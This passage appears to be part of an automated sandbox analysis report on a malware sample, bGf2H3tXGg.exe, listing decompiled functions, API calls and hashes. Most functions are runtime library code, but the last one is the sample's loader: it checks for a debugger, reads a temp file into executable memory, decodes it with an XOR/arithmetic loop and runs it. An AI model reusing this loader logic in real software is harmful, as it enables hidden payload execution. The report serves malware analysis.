                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                • __alloca_probe_16.LIBCMT ref: 00407961
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                • __alloca_probe_16.LIBCMT ref: 00407A46
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                • __freea.LIBCMT ref: 00407AB6
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                • __freea.LIBCMT ref: 00407ABF
                • __freea.LIBCMT ref: 00407AE4
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 3864826663-0
                • Opcode ID: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                • Opcode Fuzzy Hash: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408226, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E00408226(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0xf7147b27
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E00407222();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E004018CC();
				return _t136;
			}



































                0x0040822e
                0x00408235
                0x00408238
                0x00408240
                0x00408244
                0x00408250
                0x00408253
                0x00408256
                0x0040825d
                0x00408265
                0x00408268
                0x0040826e
                0x00408274
                0x00408279
                0x0040827b
                0x0040827e
                0x00408283
                0x0040828d
                0x00408294
                0x00408297
                0x0040829e
                0x004082a5
                0x004082d1
                0x004082f7
                0x004082f9
                0x00000000
                0x004082d3
                0x004082d6
                0x0040839d
                0x004083a9
                0x004083b4
                0x004083b9
                0x004082dc
                0x004082e3
                0x004082e8
                0x004082ee
                0x004082f4
                0x00000000
                0x004082f4
                0x004082ee
                0x004082d6
                0x004082a7
                0x004082ab
                0x004082ae
                0x004082b4
                0x004082b6
                0x004082b9
                0x004082bd
                0x004082fa
                0x004082fd
                0x004082fe
                0x00408303
                0x00408309
                0x0040830f
                0x0040831e
                0x00408324
                0x0040832a
                0x0040832f
                0x0040834b
                0x004083be
                0x004083c4
                0x0040834d
                0x00408355
                0x0040835e
                0x00408364
                0x00000000
                0x00408366
                0x00408368
                0x0040836b
                0x00408384
                0x00000000
                0x00408386
                0x0040838a
                0x0040838c
                0x0040838f
                0x00000000
                0x0040838f
                0x0040838a
                0x00408384
                0x00408364
                0x0040835e
                0x0040834b
                0x0040832f
                0x00408309
                0x00000000
                0x00408392
                0x00408392
                0x004083c6
                0x004083d0
                0x004083d8

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0040899B,?,00000000,?,00000000,00000000), ref: 00408268
                • __fassign.LIBCMT ref: 004082E3
                • __fassign.LIBCMT ref: 004082FE
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408324
                • WriteFile.KERNEL32(?,?,00000000,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 00408343
                • WriteFile.KERNEL32(?,?,00000001,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 0040837C
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction ID: fe7485239ce71f502252f8dacad0a730230a626615d7e560becd3163b8212ce1
                • Opcode Fuzzy Hash: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction Fuzzy Hash: B551C070900209EFCB10CFA8D985AEEBBF4EF59300F14416EE995F3291EB359951CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 27%
                			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0xf7147b27
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                0x00403639
                0x00403640
                0x00403643
                0x00403647
                0x00403652
                0x0040365a
                0x00403665
                0x0040366b
                0x0040366f
                0x00403676
                0x0040367c
                0x0040367c
                0x0040367e
                0x00403683
                0x00403688
                0x00403688
                0x00403693
                0x0040369b

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                Strings
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                • Opcode Fuzzy Hash: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0xf7147b27
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                0x004062c0
                0x004062c7
                0x004062ca
                0x004062d3
                0x004062d8
                0x004062dd
                0x004062e2
                0x004062e5
                0x004062e7
                0x004062e7
                0x004062ec
                0x00406305
                0x0040630b
                0x00406310
                0x004063af
                0x004063b3
                0x004063b8
                0x004063b8
                0x004063cc
                0x004063d4
                0x004063d4
                0x00406316
                0x00406319
                0x0040631e
                0x00406322
                0x0040636e
                0x00406370
                0x00406372
                0x00406377
                0x0040638e
                0x00406396
                0x004063a6
                0x004063a6
                0x00406396
                0x004063a8
                0x004063a9
                0x00000000
                0x004063ae
                0x00406324
                0x00406329
                0x0040632b
                0x0040632d
                0x0040632d
                0x00406335
                0x00406352
                0x0040635c
                0x00406361
                0x00000000
                0x00000000
                0x00406363
                0x00406369
                0x00406369
                0x00000000
                0x00406369
                0x00406339
                0x0040633d
                0x00406342
                0x00406346
                0x00000000
                0x00000000
                0x00406348
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                • __alloca_probe_16.LIBCMT ref: 0040633D
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                • __freea.LIBCMT ref: 004063A9
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 313313983-0
                • Opcode ID: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                • Opcode Fuzzy Hash: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xf7147b28
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                0x00405756
                0x0040575a
                0x00405761
                0x00405765
                0x00405773
                0x00405789
                0x0040578d
                0x004057b6
                0x004057b8
                0x004057bc
                0x004057bf
                0x004057bf
                0x004057c5
                0x004057c7
                0x00000000
                0x004057c8
                0x0040578f
                0x00405798
                0x004057a7
                0x0040579a
                0x0040579d
                0x004057a3
                0x004057a3
                0x004057ab
                0x00000000
                0x004057ad
                0x004057b0
                0x004057b2
                0x00000000
                0x004057b2
                0x004057ab
                0x00405767
                0x0040576c
                0x00000000

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                0x00404320
                0x00404320
                0x00404320
                0x0040432a
                0x0040432c
                0x00404331
                0x00404334
                0x00404342
                0x00404349
                0x0040434e
                0x00404351
                0x00404354
                0x00404366
                0x0040436b
                0x0040436d
                0x00404378
                0x0040437f
                0x00404384
                0x00404387
                0x00404389
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040436f
                0x0040436f
                0x00000000
                0x0040436f
                0x00404356
                0x00404356
                0x00404357
                0x00404357
                0x0040435c
                0x00404397
                0x00404398
                0x0040439e
                0x004043a3
                0x004043a6
                0x004043a7
                0x004043a8
                0x004043af
                0x004043b1
                0x004043b3
                0x004043b8
                0x004043bb
                0x004043c9
                0x004043d5
                0x004043d8
                0x004043db
                0x004043ed
                0x004043f2
                0x004043f4
                0x004043ff
                0x00404405
                0x0040440d
                0x0040440f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004043f6
                0x004043f6
                0x00000000
                0x004043f6
                0x004043dd
                0x004043dd
                0x004043de
                0x004043de
                0x00404411
                0x00404412
                0x00404412
                0x004043bd
                0x004043c3
                0x004043c7
                0x0040441a
                0x0040441b
                0x00404421
                0x00000000
                0x00000000
                0x00000000
                0x004043c7
                0x00404428
                0x00404428
                0x00404336
                0x0040433c
                0x00404340
                0x0040438b
                0x0040438c
                0x00404396
                0x00000000
                0x00000000
                0x00000000
                0x00404340

                APIs
                • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                • _abort.LIBCMT ref: 0040439E
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ErrorLast$_abort
                • String ID:
                • API String ID: 88804580-0
                • Opcode ID: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                • Opcode Fuzzy Hash: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                0x004025ba
                0x004025bf
                0x004025cb
                0x004025d0
                0x004025d5
                0x004025d7
                0x004025e2
                0x004025d9
                0x004025d9
                0x00000000
                0x004025d9
                0x004025cd
                0x004025cd
                0x004025cf
                0x004025cf

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 00000003.00000001.247203349.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                Analysis Process: bGf2H3tXGg.exe PID: 6468 Parent PID: 904 bGf2H3tXGg.exeCOMMON

                Executed Functions

                Function 10001140, Relevance: 13.6, APIs: 9, Instructions: 126filestringCOMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E10001140() {
				signed int _v5;
				struct _OVERLAPPED* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				short _v548;
				long _t55;
				void* _t57;
				long _t59;
				void* _t60;
				int _t62;

				_v12 = 0;
				_v24 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				E10001000();
				_t55 = GetTempPathW(0x103,  &_v548);
				if(_t55 != 0) {
					lstrcatW( &_v548, 0x10003000);
					_t57 = CreateFileW( &_v548, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_v16 = _t57;
					if(_v16 != 0xffffffff) {
						_t59 = GetFileSize(_v16, 0);
						_v20 = _t59;
						if(_v20 != 0xffffffff) {
							_t60 = VirtualAlloc(0, _v20, 0x3000, 0x40); // executed
							 *0x1000302c = _t60;
							if( *0x1000302c != 0) {
								_t62 = ReadFile(_v16,  *0x1000302c, _v20,  &_v24, 0); // executed
								if(_t62 != 0) {
									FindCloseChangeNotification(_v16); // executed
									_v12 = 0;
									while(_v12 < _v24) {
										_v5 =  *((intOrPtr*)( *0x1000302c + _v12));
										_v5 = (_v5 & 0x000000ff) - 0x3d;
										_v5 = _v5 & 0x000000ff ^ 0x00000007;
										_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
										_v5 = (_v5 & 0x000000ff) - _v12;
										_v5 =  !(_v5 & 0x000000ff);
										_v5 = (_v5 & 0x000000ff) - _v12;
										_v5 = _v5 & 0x000000ff ^ 0x000000d1;
										_v5 = _v12 + (_v5 & 0x000000ff);
										_v5 = _v5 & 0x000000ff ^ 0x00000093;
										_v5 = (_v5 & 0x000000ff) + 0x44;
										 *((char*)( *0x1000302c + _v12)) = _v5;
										_v12 =  &(_v12->Internal);
									}
									_v28 =  *0x1000302c;
									 *0x100020a4(); // executed
									return _v28();
								}
								return _t62;
							}
							return _t60;
						}
						return _t59;
					}
					return _t57;
				} else {
					return _t55;
				}
			}















                0x10001149
                0x10001150
                0x1000115f
                0x10001161
                0x10001161
                0x10001167
                0x10001178
                0x10001180
                0x10001193
                0x100011b2
                0x100011b8
                0x100011bf
                0x100011cc
                0x100011d2
                0x100011d9
                0x100011ed
                0x100011f3
                0x100011ff
                0x1000121b
                0x10001223
                0x1000122e
                0x10001234
                0x10001246
                0x1000125c
                0x10001266
                0x10001270
                0x10001282
                0x1000128c
                0x10001295
                0x1000129f
                0x100012ab
                0x100012b5
                0x100012c2
                0x100012cc
                0x100012db
                0x10001243
                0x10001243
                0x100012e7
                0x100012ed
                0x00000000
                0x100012f3
                0x00000000
                0x10001223
                0x00000000
                0x100011ff
                0x00000000
                0x100011d9
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 10001157
                • DebugBreak.KERNEL32 ref: 10001161
                • GetTempPathW.KERNEL32(00000103,?), ref: 10001178
                • lstrcatW.KERNEL32(?,10003000), ref: 10001193
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 100011B2
                • GetFileSize.KERNEL32(000000FF,00000000), ref: 100011CC
                Memory Dump Source
                • Source File: 0000000B.00000002.306098906.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                • Associated: 0000000B.00000002.306081682.0000000010000000.00000002.00020000.sdmp Download File
                • Associated: 0000000B.00000002.306112159.0000000010002000.00000002.00020000.sdmp Download File
                • Associated: 0000000B.00000002.306122588.0000000010004000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$BreakCreateDebugDebuggerPathPresentSizeTemplstrcat
                • String ID:
                • API String ID: 3387724011-0
                • Opcode ID: 654d6cc6bda687c2126d4e8120b40575b06e360e86480a58b1eab55cdbf9aa21
                • Instruction ID: 1b8f206140e46b40f8892c82d4497af35837fa909e52085900f9582b4d9b2705
                • Opcode Fuzzy Hash: 654d6cc6bda687c2126d4e8120b40575b06e360e86480a58b1eab55cdbf9aa21
